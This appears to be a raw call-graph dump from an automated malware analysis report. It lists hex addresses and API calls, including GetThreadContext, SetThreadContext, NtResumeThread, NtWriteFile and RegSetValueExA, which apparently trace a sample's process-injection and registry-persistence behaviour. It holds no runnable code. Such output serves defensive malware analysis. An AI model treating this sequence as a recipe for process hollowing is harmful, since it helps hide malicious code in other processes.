37329->37334 37335 2da89d0 20 API calls 37330->37335 37336 2d947ec 11 API calls 37331->37336 37337 2d947ec 11 API calls 37332->37337 37338 2da89d0 20 API calls 37333->37338 37341 2db8b75 37334->37341 37339 2db7f84 37335->37339 37342 2db9968 37336->37342 37343 2db9c3f 37337->37343 37344 2dba10f 37338->37344 37340 2d94860 11 API calls 37339->37340 37345 2db7fa5 37340->37345 37346 2da89d0 20 API calls 37341->37346 37347 2da89d0 20 API calls 37342->37347 37348 2da89d0 20 API calls 37343->37348 37349 2da89d0 20 API calls 37344->37349 37353 2d947ec 11 API calls 37345->37353 37350 2db8b99 37346->37350 37354 2db998c 37347->37354 37355 2db9c63 37348->37355 37362 2dba142 37349->37362 37351 2db8bb9 37350->37351 37352 2db8ba2 37350->37352 37358 2d94860 11 API calls 37351->37358 38201 2da8730 17 API calls 37352->38201 37364 2db7fdc 37353->37364 37757 2dae358 37354->37757 37356 2d94860 11 API calls 37355->37356 37366 2db9c84 37356->37366 37368 2db8bda 37358->37368 37361 2d94530 11 API calls 37363 2db99b1 37361->37363 37367 2da89d0 20 API calls 37362->37367 37365 2d94860 11 API calls 37363->37365 37369 2da89d0 20 API calls 37364->37369 37374 2db99d2 37365->37374 37370 2d947ec 11 API calls 37366->37370 37375 2dba175 37367->37375 37371 2d947ec 11 API calls 37368->37371 37372 2db8000 37369->37372 37377 2db9cbb 37370->37377 37379 2db8c11 37371->37379 37373 2d94860 11 API calls 37372->37373 37380 2db8021 37373->37380 37376 2d947ec 11 API calls 37374->37376 37378 2da89d0 20 API calls 37375->37378 37389 2db9a09 37376->37389 37382 2da89d0 20 API calls 37377->37382 37381 2dba1a8 37378->37381 37384 2da89d0 20 API calls 37379->37384 37386 2d947ec 11 API calls 37380->37386 37383 2d94860 11 API calls 37381->37383 37387 2db9cdf 37382->37387 37393 2dba1c9 37383->37393 37385 2db8c35 37384->37385 37388 2d94860 11 API calls 37385->37388 37395 2db8058 37386->37395 37777 2d949f8 37387->37777 37399 2db8c56 37388->37399 37394 2da89d0 20 API calls 37389->37394 37398 2d947ec 11 API calls 37393->37398 37396 2db9a2d 37394->37396 37400 2da89d0 20 API calls 37395->37400 37397 2d94860 11 API calls 37396->37397 37404 2db9a4e 37397->37404 37405 2dba200 37398->37405 37401 2d947ec 11 API calls 37399->37401 37402 2db807c 37400->37402 37408 2db8c8d 37401->37408 37403 2d94860 11 API calls 37402->37403 37409 2db809d 37403->37409 37406 2d947ec 11 API calls 37404->37406 37407 2da89d0 20 API calls 37405->37407 37415 2db9a85 37406->37415 37410 2dba224 37407->37410 37412 2da89d0 20 API calls 37408->37412 37413 2d947ec 11 API calls 37409->37413 37411 2d94860 11 API calls 37410->37411 37418 2dba245 37411->37418 37414 2db8cb1 37412->37414 37419 2db80d4 37413->37419 37416 2d94860 11 API calls 37414->37416 37417 2da89d0 20 API calls 37415->37417 37421 2db8cd2 37416->37421 37427 2db9aa9 37417->37427 37420 2d947ec 11 API calls 37418->37420 37422 2da89d0 20 API calls 37419->37422 37426 2dba27c 37420->37426 37423 2d947ec 11 API calls 37421->37423 37424 2db80f8 37422->37424 37430 2db8d09 37423->37430 38199 2dab118 39 API calls 37424->38199 37429 2da89d0 20 API calls 37426->37429 37762 2dadc8c 37427->37762 37434 2dba2a0 37429->37434 37432 2da89d0 20 API calls 37430->37432 37431 2db8109 37433 2db8d2d ResumeThread 37432->37433 37435 2d94860 11 API calls 37433->37435 37436 2da89d0 20 API calls 37434->37436 37438 2db8d59 37435->37438 37437 2dba2d3 37436->37437 37439 2d94860 11 API calls 37437->37439 37440 2d947ec 11 API calls 37438->37440 37441 2dba2f4 37439->37441 37443 2db8d90 37440->37443 37442 2d947ec 11 API calls 37441->37442 37446 2dba32b 37442->37446 37444 2da89d0 20 API calls 37443->37444 37445 2db8db4 37444->37445 37447 2d94860 11 API calls 37445->37447 37448 2da89d0 20 API calls 37446->37448 37451 2db8dd5 37447->37451 37449 2dba34f 37448->37449 37450 2d94860 11 API calls 37449->37450 37453 2dba370 37450->37453 37452 2d947ec 11 API calls 37451->37452 37455 2db8e0c 37452->37455 37454 2d947ec 11 API calls 37453->37454 37458 2dba3a7 37454->37458 37456 2da89d0 20 API calls 37455->37456 37457 2db8e30 37456->37457 37459 2d94860 11 API calls 37457->37459 37460 2da89d0 20 API calls 37458->37460 37463 2db8e51 37459->37463 37461 2dba3cb 37460->37461 37462 2d94860 11 API calls 37461->37462 37465 2dba3ec 37462->37465 37464 2d947ec 11 API calls 37463->37464 37467 2db8e88 37464->37467 37466 2d947ec 11 API calls 37465->37466 37470 2dba423 37466->37470 37468 2da89d0 20 API calls 37467->37468 37469 2db8eac CloseHandle 37468->37469 37471 2d94860 11 API calls 37469->37471 37472 2da89d0 20 API calls 37470->37472 37473 2db8ed8 37471->37473 37474 2dba447 37472->37474 37475 2d947ec 11 API calls 37473->37475 37476 2da89d0 20 API calls 37474->37476 37477 2db8f0f 37475->37477 37478 2dba47a 37476->37478 37479 2da89d0 20 API calls 37477->37479 37481 2da89d0 20 API calls 37478->37481 37480 2db8f33 37479->37480 37482 2d94860 11 API calls 37480->37482 37483 2dba4ad 37481->37483 37484 2db8f54 37482->37484 37485 2da89d0 20 API calls 37483->37485 37486 2d947ec 11 API calls 37484->37486 37487 2dba4e0 37485->37487 37488 2db8f8b 37486->37488 37490 2da89d0 20 API calls 37487->37490 37489 2da89d0 20 API calls 37488->37489 37491 2db8faf 37489->37491 37492 2dba513 37490->37492 37494 2d94860 11 API calls 37491->37494 37493 2d94860 11 API calls 37492->37493 37495 2dba534 37493->37495 37496 2db8fd0 37494->37496 37497 2d947ec 11 API calls 37495->37497 37498 2d947ec 11 API calls 37496->37498 37499 2dba56b 37497->37499 37500 2db9007 37498->37500 37501 2da89d0 20 API calls 37499->37501 37502 2da89d0 20 API calls 37500->37502 37504 2dba58f 37501->37504 37503 2db902b 37502->37503 37505 2d94860 11 API calls 37503->37505 37506 2d94860 11 API calls 37504->37506 37508 2db904c 37505->37508 37507 2dba5b0 37506->37507 37509 2d947ec 11 API calls 37507->37509 37510 2d947ec 11 API calls 37508->37510 37511 2dba5e7 37509->37511 37512 2db9083 37510->37512 37513 2da89d0 20 API calls 37511->37513 37514 2da89d0 20 API calls 37512->37514 37517 2dba60b 37513->37517 37515 2db90a7 37514->37515 37516 2d94860 11 API calls 37515->37516 37519 2db90c8 37516->37519 37518 2da89d0 20 API calls 37517->37518 37521 2dba63e 37518->37521 37520 2d947ec 11 API calls 37519->37520 37523 2db90ff 37520->37523 37522 2da89d0 20 API calls 37521->37522 37526 2dba671 37522->37526 37524 2da89d0 20 API calls 37523->37524 37525 2db9123 37524->37525 37527 2d94860 11 API calls 37525->37527 37528 2da89d0 20 API calls 37526->37528 37529 2db9144 37527->37529 37530 2dba6a4 37528->37530 37531 2d947ec 11 API calls 37529->37531 37532 2da89d0 20 API calls 37530->37532 37533 2db917b 37531->37533 37534 2dba6d7 37532->37534 37535 2da89d0 20 API calls 37533->37535 37537 2da89d0 20 API calls 37534->37537 37536 2db919f 37535->37536 37538 2d94860 11 API calls 37536->37538 37539 2dba70a 37537->37539 37541 2db91c0 37538->37541 37540 2d94860 11 API calls 37539->37540 37543 2dba72b 37540->37543 37542 2d947ec 11 API calls 37541->37542 37545 2db91f7 37542->37545 37544 2d947ec 11 API calls 37543->37544 37546 2dba762 37544->37546 37547 2da89d0 20 API calls 37545->37547 37549 2da89d0 20 API calls 37546->37549 37548 2db921b 37547->37548 38202 2da894c LoadLibraryW 37548->38202 37550 2dba786 37549->37550 37551 2d94860 11 API calls 37550->37551 37556 2dba7a7 37551->37556 37554 2da894c 21 API calls 37555 2db924e 37554->37555 37557 2da894c 21 API calls 37555->37557 37560 2d947ec 11 API calls 37556->37560 37558 2db9262 37557->37558 37559 2da894c 21 API calls 37558->37559 37561 2db9276 37559->37561 37564 2dba7de 37560->37564 37562 2da894c 21 API calls 37561->37562 37563 2db928a 37562->37563 37565 2da894c 21 API calls 37563->37565 37567 2da89d0 20 API calls 37564->37567 37566 2db929e CloseHandle 37565->37566 37568 2d94860 11 API calls 37566->37568 37569 2dba802 37567->37569 37571 2db92ca 37568->37571 37570 2d94860 11 API calls 37569->37570 37572 2dba823 37570->37572 37573 2d947ec 11 API calls 37571->37573 37574 2d947ec 11 API calls 37572->37574 37575 2db9301 37573->37575 37576 2dba85a 37574->37576 37577 2da89d0 20 API calls 37575->37577 37579 2da89d0 20 API calls 37576->37579 37578 2db9325 37577->37578 37580 2d94860 11 API calls 37578->37580 37581 2dba87e 37579->37581 37583 2db9346 37580->37583 37582 2d94860 11 API calls 37581->37582 37584 2dba89f 37582->37584 37585 2d947ec 11 API calls 37583->37585 37586 2d947ec 11 API calls 37584->37586 37587 2db937d 37585->37587 37589 2dba8d6 37586->37589 37588 2da89d0 20 API calls 37587->37588 37588->37046 37590 2da89d0 20 API calls 37589->37590 37591 2dba8fa 37590->37591 37592 2d94860 11 API calls 37591->37592 37593 2dba91b 37592->37593 37594 2d947ec 11 API calls 37593->37594 37595 2dba952 37594->37595 37596 2da89d0 20 API calls 37595->37596 37597 2dba976 37596->37597 37598 2da89d0 20 API calls 37597->37598 37599 2dba985 37598->37599 37600 2da89d0 20 API calls 37599->37600 37601 2dba994 37600->37601 37602 2da89d0 20 API calls 37601->37602 37603 2dba9a3 37602->37603 37604 2da89d0 20 API calls 37603->37604 37605 2dba9b2 37604->37605 37606 2da89d0 20 API calls 37605->37606 37607 2dba9c1 37606->37607 37608 2da89d0 20 API calls 37607->37608 37609 2dba9d0 37608->37609 37610 2da89d0 20 API calls 37609->37610 37611 2dba9df 37610->37611 37612 2da89d0 20 API calls 37611->37612 37613 2dba9ee 37612->37613 37614 2da89d0 20 API calls 37613->37614 37615 2dba9fd 37614->37615 37616 2da89d0 20 API calls 37615->37616 37617 2dbaa0c 37616->37617 37618 2da89d0 20 API calls 37617->37618 37619 2dbaa1b 37618->37619 37620 2da89d0 20 API calls 37619->37620 37621 2dbaa2a 37620->37621 37622 2da89d0 20 API calls 37621->37622 37623 2dbaa39 37622->37623 37624 2da89d0 20 API calls 37623->37624 37625 2dbaa48 37624->37625 37626 2da89d0 20 API calls 37625->37626 37627 2dbaa57 37626->37627 37628 2d94860 11 API calls 37627->37628 37629 2dbaa78 37628->37629 37630 2d947ec 11 API calls 37629->37630 37631 2dbaaaf 37630->37631 37632 2da89d0 20 API calls 37631->37632 37633 2dbaad3 37632->37633 37634 2da89d0 20 API calls 37633->37634 37635 2dbab06 37634->37635 37636 2da89d0 20 API calls 37635->37636 37637 2dbab39 37636->37637 37638 2da89d0 20 API calls 37637->37638 37639 2dbab6c 37638->37639 37640 2da89d0 20 API calls 37639->37640 37641 2dbab9f 37640->37641 37642 2da89d0 20 API calls 37641->37642 37643 2dbabd2 37642->37643 37644 2da89d0 20 API calls 37643->37644 37645 2dbac05 37644->37645 37646 2da89d0 20 API calls 37645->37646 37647 2dbac38 37646->37647 37648 2d94860 11 API calls 37647->37648 37649 2dbac59 37648->37649 37650 2d947ec 11 API calls 37649->37650 37651 2dbac90 37650->37651 37652 2da89d0 20 API calls 37651->37652 37653 2dbacb4 37652->37653 37654 2d94860 11 API calls 37653->37654 37655 2dbacd5 37654->37655 37656 2d947ec 11 API calls 37655->37656 37657 2dbad0c 37656->37657 37658 2da89d0 20 API calls 37657->37658 37659 2dbad30 37658->37659 37660 2d94860 11 API calls 37659->37660 37661 2dbad51 37660->37661 37662 2d947ec 11 API calls 37661->37662 37663 2dbad88 37662->37663 37664 2da89d0 20 API calls 37663->37664 37665 2dbadac 37664->37665 37666 2da89d0 20 API calls 37665->37666 37667 2dbaddf 37666->37667 37668 2da89d0 20 API calls 37667->37668 37669 2dbae12 37668->37669 37670 2da89d0 20 API calls 37669->37670 37671 2dbae45 37670->37671 37672 2da89d0 20 API calls 37671->37672 37673 2dbae78 37672->37673 37674 2da89d0 20 API calls 37673->37674 37675 2dbaeab 37674->37675 37676 2da89d0 20 API calls 37675->37676 37677 2dbaede 37676->37677 37678 2da89d0 20 API calls 37677->37678 37679 2dbaf11 37678->37679 37680 2da89d0 20 API calls 37679->37680 37681 2dbaf44 37680->37681 37682 2da89d0 20 API calls 37681->37682 37683 2dbaf77 37682->37683 37684 2da89d0 20 API calls 37683->37684 37685 2dbafaa 37684->37685 37686 2da89d0 20 API calls 37685->37686 37687 2dbafdd 37686->37687 37688 2da89d0 20 API calls 37687->37688 37689 2dbb010 37688->37689 37690 2da89d0 20 API calls 37689->37690 37691 2dbb043 37690->37691 37692 2da89d0 20 API calls 37691->37692 37693 2dbb076 37692->37693 37694 2da89d0 20 API calls 37693->37694 37695 2dbb0a9 37694->37695 37696 2da89d0 20 API calls 37695->37696 37697 2dbb0dc 37696->37697 37698 2da89d0 20 API calls 37697->37698 37699 2dbb10f 37698->37699 37700 2da89d0 20 API calls 37699->37700 37701 2dbb142 37700->37701 37702 2da89d0 20 API calls 37701->37702 37703 2dbb175 37702->37703 37704 2da8338 18 API calls 37703->37704 37705 2dbb184 37704->37705 37706 2d94860 11 API calls 37705->37706 37707 2dbb1a5 37706->37707 37708 2d947ec 11 API calls 37707->37708 37709 2dbb1dc 37708->37709 37710 2da89d0 20 API calls 37709->37710 37711 2dbb200 37710->37711 37712 2d94860 11 API calls 37711->37712 37713 2dbb221 37712->37713 37714 2d947ec 11 API calls 37713->37714 37715 2dbb258 37714->37715 37716 2da89d0 20 API calls 37715->37716 37717 2dbb27c 37716->37717 37718 2d94860 11 API calls 37717->37718 37719 2dbb29d 37718->37719 37720 2d947ec 11 API calls 37719->37720 37721 2dbb2d4 37720->37721 37722 2da89d0 20 API calls 37721->37722 37723 2dbb2f8 ExitProcess 37722->37723 37731 2dae114 37724->37731 37725 2dae197 37726 2d944dc 11 API calls 37725->37726 37727 2dae19f 37726->37727 37729 2d94530 11 API calls 37727->37729 37728 2d949f8 11 API calls 37728->37731 37730 2dae1aa 37729->37730 37732 2d94500 11 API calls 37730->37732 37731->37725 37731->37728 37733 2dae1c4 37732->37733 37733->36937 37735 2daf22b 37734->37735 37736 2daf256 RegOpenKeyA 37735->37736 37737 2daf264 37736->37737 37738 2d949f8 11 API calls 37737->37738 37739 2daf27c 37738->37739 37740 2daf289 RegSetValueExA RegCloseKey 37739->37740 37741 2daf2ad 37740->37741 37742 2d94500 11 API calls 37741->37742 37743 2daf2ba 37742->37743 37744 2d944dc 11 API calls 37743->37744 37745 2daf2c2 37744->37745 37745->36940 37747 2daf0b9 37746->37747 37748 2daf0e5 37747->37748 38209 2d946c4 11 API calls 37747->38209 38210 2d94530 11 API calls 37747->38210 37749 2d944dc 11 API calls 37748->37749 37751 2daf0fa 37749->37751 37751->37198 38211 2d949a0 37753->38211 37756 2d97e71 37756->37262 37756->37265 37758 2d94bcc 11 API calls 37757->37758 37759 2dae370 37758->37759 37760 2dae391 37759->37760 37761 2d949f8 11 API calls 37759->37761 37760->37361 37761->37759 37763 2dadca2 37762->37763 38213 2d94f20 37763->38213 37765 2dadcaa 37766 2dadcca RtlDosPathNameToNtPathName_U 37765->37766 38217 2dadbdc 37766->38217 37768 2dadce6 NtCreateFile 37769 2dadd11 37768->37769 37770 2d949f8 11 API calls 37769->37770 37771 2dadd23 NtWriteFile NtClose 37770->37771 37772 2dadd4d 37771->37772 38218 2d94c60 37772->38218 37775 2d944dc 11 API calls 37776 2dadd5d 37775->37776 37776->37262 37778 2d949ac 37777->37778 37779 2d945a0 11 API calls 37778->37779 37781 2d949e7 37778->37781 37780 2d949c3 37779->37780 37780->37781 37782 2d92c2c 11 API calls 37780->37782 37783 2da8d70 37781->37783 37782->37781 37784 2da8d78 37783->37784 37785 2d94860 11 API calls 37784->37785 37786 2da8dbb 37785->37786 37787 2d947ec 11 API calls 37786->37787 37788 2da8de0 37787->37788 37789 2da89d0 20 API calls 37788->37789 37790 2da8dfb 37789->37790 37791 2d94860 11 API calls 37790->37791 37792 2da8e14 37791->37792 37793 2d947ec 11 API calls 37792->37793 37794 2da8e39 37793->37794 37795 2da89d0 20 API calls 37794->37795 37796 2da8e54 37795->37796 37797 2daa8b7 37796->37797 37798 2d94860 11 API calls 37796->37798 37799 2d94500 11 API calls 37797->37799 37803 2da8e85 37798->37803 37800 2daa8d4 37799->37800 37801 2d94500 11 API calls 37800->37801 37802 2daa8e4 37801->37802 37804 2d94c60 SysFreeString 37802->37804 37806 2d947ec 11 API calls 37803->37806 37805 2daa8ef 37804->37805 37807 2d94500 11 API calls 37805->37807 37811 2da8eaa 37806->37811 37808 2daa8ff 37807->37808 37809 2d944dc 11 API calls 37808->37809 37810 2daa907 37809->37810 37812 2d94500 11 API calls 37810->37812 37814 2da89d0 20 API calls 37811->37814 37813 2daa914 37812->37813 37815 2d94500 11 API calls 37813->37815 37816 2da8ec5 37814->37816 37817 2daa921 37815->37817 37818 2d94860 11 API calls 37816->37818 37817->37108 37819 2da8ede 37818->37819 37820 2d947ec 11 API calls 37819->37820 37821 2da8f03 37820->37821 37822 2da89d0 20 API calls 37821->37822 37823 2da8f1e 37822->37823 37823->37797 37824 2d94860 11 API calls 37823->37824 37825 2da8f66 37824->37825 37826 2d947ec 11 API calls 37825->37826 37827 2da8f8b 37826->37827 37828 2da89d0 20 API calls 37827->37828 37829 2da8fa6 37828->37829 37830 2d94860 11 API calls 37829->37830 37831 2da8fbf 37830->37831 37832 2d947ec 11 API calls 37831->37832 37833 2da8fe4 37832->37833 37834 2da89d0 20 API calls 37833->37834 37835 2da8fff 37834->37835 37836 2d94860 11 API calls 37835->37836 37837 2da9044 37836->37837 37838 2d947ec 11 API calls 37837->37838 37839 2da9069 37838->37839 37840 2da89d0 20 API calls 37839->37840 37841 2da9084 37840->37841 37842 2d94860 11 API calls 37841->37842 37843 2da909d 37842->37843 37844 2d947ec 11 API calls 37843->37844 37845 2da90c5 37844->37845 37846 2da89d0 20 API calls 37845->37846 37847 2da90e3 37846->37847 37848 2d94860 11 API calls 37847->37848 37849 2da90ff 37848->37849 37850 2d947ec 11 API calls 37849->37850 37851 2da9130 37850->37851 37852 2da89d0 20 API calls 37851->37852 37853 2da9154 37852->37853 37854 2d94860 11 API calls 37853->37854 37855 2da9170 37854->37855 37856 2d947ec 11 API calls 37855->37856 37857 2da91a1 37856->37857 37858 2da89d0 20 API calls 37857->37858 37859 2da91c5 37858->37859 37860 2d94860 11 API calls 37859->37860 37861 2da91e1 37860->37861 37862 2d947ec 11 API calls 37861->37862 37863 2da9212 37862->37863 37864 2da89d0 20 API calls 37863->37864 37865 2da9236 37864->37865 38221 2da8788 37865->38221 37868 2da92e8 37869 2d94860 11 API calls 37868->37869 37871 2da9304 37869->37871 37870 2d94860 11 API calls 37872 2da9293 37870->37872 37873 2d947ec 11 API calls 37871->37873 37874 2d947ec 11 API calls 37872->37874 37875 2da9335 37873->37875 37876 2da92c4 37874->37876 37877 2da89d0 20 API calls 37875->37877 37878 2da89d0 20 API calls 37876->37878 37879 2da9359 37877->37879 37878->37868 37880 2da89d0 20 API calls 37879->37880 37881 2da938c 37880->37881 37882 2d94860 11 API calls 37881->37882 37883 2da93a8 37882->37883 37884 2d947ec 11 API calls 37883->37884 37885 2da93d9 37884->37885 37886 2da89d0 20 API calls 37885->37886 37887 2da93fd 37886->37887 37888 2d94860 11 API calls 37887->37888 37889 2da9419 37888->37889 37890 2d947ec 11 API calls 37889->37890 37891 2da944a 37890->37891 37892 2da89d0 20 API calls 37891->37892 37893 2da946e 37892->37893 37894 2d92ee0 2 API calls 37893->37894 37895 2da9473 37894->37895 37896 2d94860 11 API calls 37895->37896 37897 2da94b6 37896->37897 37898 2d947ec 11 API calls 37897->37898 37899 2da94e7 37898->37899 37900 2da89d0 20 API calls 37899->37900 37901 2da950b 37900->37901 37902 2d94860 11 API calls 37901->37902 37903 2da9527 37902->37903 37904 2d947ec 11 API calls 37903->37904 37905 2da9558 37904->37905 37906 2da89d0 20 API calls 37905->37906 37907 2da957c 37906->37907 37908 2d94860 11 API calls 37907->37908 37909 2da9598 37908->37909 37910 2d947ec 11 API calls 37909->37910 37911 2da95c9 37910->37911 37912 2da89d0 20 API calls 37911->37912 37913 2da95ed GetThreadContext 37912->37913 37913->37797 37914 2da960f 37913->37914 37915 2d94860 11 API calls 37914->37915 37916 2da962b 37915->37916 37917 2d947ec 11 API calls 37916->37917 37918 2da965c 37917->37918 37919 2da89d0 20 API calls 37918->37919 37920 2da9680 37919->37920 37921 2d94860 11 API calls 37920->37921 37922 2da969c 37921->37922 37923 2d947ec 11 API calls 37922->37923 37924 2da96cd 37923->37924 37925 2da89d0 20 API calls 37924->37925 37926 2da96f1 37925->37926 37927 2d94860 11 API calls 37926->37927 37928 2da970d 37927->37928 37929 2d947ec 11 API calls 37928->37929 37930 2da973e 37929->37930 37931 2da89d0 20 API calls 37930->37931 37932 2da9762 37931->37932 37933 2d94860 11 API calls 37932->37933 37934 2da977e 37933->37934 37935 2d947ec 11 API calls 37934->37935 37936 2da97af 37935->37936 37937 2da89d0 20 API calls 37936->37937 37938 2da97d3 37937->37938 37939 2d94860 11 API calls 37938->37939 37940 2da97ef 37939->37940 37941 2d947ec 11 API calls 37940->37941 37942 2da9820 37941->37942 37943 2da89d0 20 API calls 37942->37943 37944 2da9844 37943->37944 38233 2da8400 37944->38233 37947 2da9878 37950 2d94860 11 API calls 37947->37950 37948 2da9b7f 37949 2d94860 11 API calls 37948->37949 37951 2da9b9b 37949->37951 37952 2da9894 37950->37952 37953 2d947ec 11 API calls 37951->37953 37954 2d947ec 11 API calls 37952->37954 37955 2da9bcc 37953->37955 37956 2da98c5 37954->37956 37958 2da89d0 20 API calls 37955->37958 37957 2da89d0 20 API calls 37956->37957 37959 2da98e9 37957->37959 37960 2da9b78 37958->37960 37962 2d94860 11 API calls 37959->37962 37961 2d94860 11 API calls 37960->37961 37963 2da9c0c 37961->37963 37964 2da9905 37962->37964 37965 2d947ec 11 API calls 37963->37965 37966 2d947ec 11 API calls 37964->37966 37967 2da9c3d 37965->37967 37968 2da9936 37966->37968 37969 2da89d0 20 API calls 37967->37969 37970 2da89d0 20 API calls 37968->37970 37972 2da9c61 37969->37972 37971 2da995a 37970->37971 37973 2d94860 11 API calls 37971->37973 37974 2d94860 11 API calls 37972->37974 37976 2da9976 37973->37976 37975 2da9c7d 37974->37975 37977 2d947ec 11 API calls 37975->37977 37978 2d947ec 11 API calls 37976->37978 37979 2da9cae 37977->37979 37980 2da99a7 37978->37980 37981 2da89d0 20 API calls 37979->37981 37982 2da89d0 20 API calls 37980->37982 37983 2da9cd2 37981->37983 37984 2da99cb 37982->37984 37985 2d94860 11 API calls 37983->37985 38247 2da8670 37984->38247 37992 2da9cee 37985->37992 37988 2da9a0b 37991 2d94860 11 API calls 37988->37991 37989 2da99e3 37990 2da7a2c 18 API calls 37989->37990 37993 2da9a04 37990->37993 37996 2da9a27 37991->37996 37994 2d947ec 11 API calls 37992->37994 37995 2d94860 11 API calls 37993->37995 37998 2da9d1f 37994->37998 37999 2da9a98 37995->37999 37997 2d947ec 11 API calls 37996->37997 38003 2da9a58 37997->38003 38000 2da89d0 20 API calls 37998->38000 38001 2d947ec 11 API calls 37999->38001 38002 2da9d43 38000->38002 38007 2da9ac9 38001->38007 38004 2da7a2c 18 API calls 38002->38004 38005 2da89d0 20 API calls 38003->38005 38006 2da9d64 38004->38006 38005->37993 38006->37797 38008 2d94860 11 API calls 38006->38008 38009 2da89d0 20 API calls 38007->38009 38012 2da9d92 38008->38012 38010 2da9aed 38009->38010 38011 2d94860 11 API calls 38010->38011 38014 2da9b09 38011->38014 38013 2d947ec 11 API calls 38012->38013 38016 2da9dc3 38013->38016 38015 2d947ec 11 API calls 38014->38015 38019 2da9b3a 38015->38019 38017 2da89d0 20 API calls 38016->38017 38018 2da9de7 38017->38018 38020 2d94860 11 API calls 38018->38020 38021 2da89d0 20 API calls 38019->38021 38024 2da9e03 38020->38024 38022 2da9b5e 38021->38022 38261 2da7a2c 38022->38261 38025 2d947ec 11 API calls 38024->38025 38026 2da9e34 38025->38026 38027 2da89d0 20 API calls 38026->38027 38028 2da9e58 38027->38028 38275 2da8c80 38028->38275 38030 2d94860 11 API calls 38032 2da9edf 38030->38032 38031 2da9e5f 38031->38030 38033 2d947ec 11 API calls 38032->38033 38034 2da9f10 38033->38034 38035 2da89d0 20 API calls 38034->38035 38036 2da9f34 38035->38036 38037 2d94860 11 API calls 38036->38037 38038 2da9f50 38037->38038 38039 2d947ec 11 API calls 38038->38039 38040 2da9f81 38039->38040 38041 2da89d0 20 API calls 38040->38041 38042 2da9fa5 38041->38042 38043 2d94860 11 API calls 38042->38043 38044 2da9fc1 38043->38044 38045 2d947ec 11 API calls 38044->38045 38046 2da9ff2 38045->38046 38047 2da89d0 20 API calls 38046->38047 38048 2daa016 38047->38048 38049 2da7d78 18 API calls 38048->38049 38050 2daa033 38049->38050 38051 2d94860 11 API calls 38050->38051 38052 2daa04f 38051->38052 38053 2d947ec 11 API calls 38052->38053 38054 2daa080 38053->38054 38055 2da89d0 20 API calls 38054->38055 38056 2daa0a4 38055->38056 38057 2d94860 11 API calls 38056->38057 38058 2daa0c0 38057->38058 38059 2d947ec 11 API calls 38058->38059 38060 2daa0f1 38059->38060 38061 2da89d0 20 API calls 38060->38061 38062 2daa115 38061->38062 38063 2d94860 11 API calls 38062->38063 38064 2daa131 38063->38064 38065 2d947ec 11 API calls 38064->38065 38066 2daa162 38065->38066 38067 2da89d0 20 API calls 38066->38067 38068 2daa186 38067->38068 38069 2da7d78 18 API calls 38068->38069 38070 2daa1a6 38069->38070 38071 2d94860 11 API calls 38070->38071 38072 2daa1c2 38071->38072 38073 2d947ec 11 API calls 38072->38073 38074 2daa1f3 38073->38074 38075 2da89d0 20 API calls 38074->38075 38076 2daa217 38075->38076 38077 2d94860 11 API calls 38076->38077 38078 2daa233 38077->38078 38079 2d947ec 11 API calls 38078->38079 38080 2daa264 38079->38080 38081 2da89d0 20 API calls 38080->38081 38082 2daa288 38081->38082 38083 2d94860 11 API calls 38082->38083 38084 2daa2a4 38083->38084 38085 2d947ec 11 API calls 38084->38085 38086 2daa2d5 38085->38086 38087 2da89d0 20 API calls 38086->38087 38088 2daa2f9 SetThreadContext NtResumeThread 38087->38088 38089 2d94860 11 API calls 38088->38089 38090 2daa345 38089->38090 38091 2d947ec 11 API calls 38090->38091 38092 2daa376 38091->38092 38093 2da89d0 20 API calls 38092->38093 38094 2daa39a 38093->38094 38095 2d94860 11 API calls 38094->38095 38096 2daa3b6 38095->38096 38097 2d947ec 11 API calls 38096->38097 38098 2daa3e7 38097->38098 38099 2da89d0 20 API calls 38098->38099 38100 2daa40b 38099->38100 38101 2d94860 11 API calls 38100->38101 38102 2daa427 38101->38102 38103 2d947ec 11 API calls 38102->38103 38104 2daa458 38103->38104 38105 2da89d0 20 API calls 38104->38105 38106 2daa47c 38105->38106 38107 2d94860 11 API calls 38106->38107 38108 2daa498 38107->38108 38109 2d947ec 11 API calls 38108->38109 38110 2daa4c9 38109->38110 38111 2da89d0 20 API calls 38110->38111 38112 2daa4ed 38111->38112 38113 2d92c2c 11 API calls 38112->38113 38114 2daa4fc 38113->38114 38115 2d94860 11 API calls 38114->38115 38116 2daa51e 38115->38116 38117 2d947ec 11 API calls 38116->38117 38118 2daa54f 38117->38118 38119 2da89d0 20 API calls 38118->38119 38120 2daa573 38119->38120 38121 2da894c 21 API calls 38120->38121 38122 2daa587 38121->38122 38123 2da894c 21 API calls 38122->38123 38124 2daa59b 38123->38124 38125 2da894c 21 API calls 38124->38125 38126 2daa5af 38125->38126 38127 2d94860 11 API calls 38126->38127 38128 2daa5cb 38127->38128 38129 2d947ec 11 API calls 38128->38129 38130 2daa5fc 38129->38130 38131 2da89d0 20 API calls 38130->38131 38132 2daa620 38131->38132 38133 2da894c 21 API calls 38132->38133 38134 2daa634 38133->38134 38135 2da894c 21 API calls 38134->38135 38136 2daa648 38135->38136 38137 2d94860 11 API calls 38136->38137 38138 2daa664 38137->38138 38139 2d947ec 11 API calls 38138->38139 38140 2daa682 38139->38140 38141 2da894c 21 API calls 38140->38141 38142 2daa69a 38141->38142 38143 2d94860 11 API calls 38142->38143 38144 2daa6b6 38143->38144 38145 2d947ec 11 API calls 38144->38145 38146 2daa6d4 38145->38146 38147 2da894c 21 API calls 38146->38147 38148 2daa6ec 38147->38148 38149 2da894c 21 API calls 38148->38149 38150 2daa700 38149->38150 38151 2da894c 21 API calls 38150->38151 38152 2daa714 38151->38152 38153 2da894c 21 API calls 38152->38153 38154 2daa728 38153->38154 38155 2da894c 21 API calls 38154->38155 38156 2daa73c 38155->38156 38157 2d94860 11 API calls 38156->38157 38158 2daa758 38157->38158 38159 2d947ec 11 API calls 38158->38159 38160 2daa776 38159->38160 38161 2da894c 21 API calls 38160->38161 38162 2daa78e 38161->38162 38163 2d94860 11 API calls 38162->38163 38164 2daa7aa 38163->38164 38165 2d947ec 11 API calls 38164->38165 38166 2daa7c8 38165->38166 38167 2da894c 21 API calls 38166->38167 38168 2daa7e0 38167->38168 38169 2d94860 11 API calls 38168->38169 38170 2daa7fc 38169->38170 38171 2d947ec 11 API calls 38170->38171 38172 2daa81a 38171->38172 38173 2da894c 21 API calls 38172->38173 38174 2daa832 38173->38174 38175 2d94860 11 API calls 38174->38175 38176 2daa84e 38175->38176 38177 2d947ec 11 API calls 38176->38177 38178 2daa86c 38177->38178 38179 2da894c 21 API calls 38178->38179 38180 2daa884 38179->38180 38181 2da894c 21 API calls 38180->38181 38182 2daa8a3 38181->38182 38183 2da894c 21 API calls 38182->38183 38183->37797 38185 2d94530 11 API calls 38184->38185 38186 2da85df 38185->38186 38187 2d94860 11 API calls 38186->38187 38188 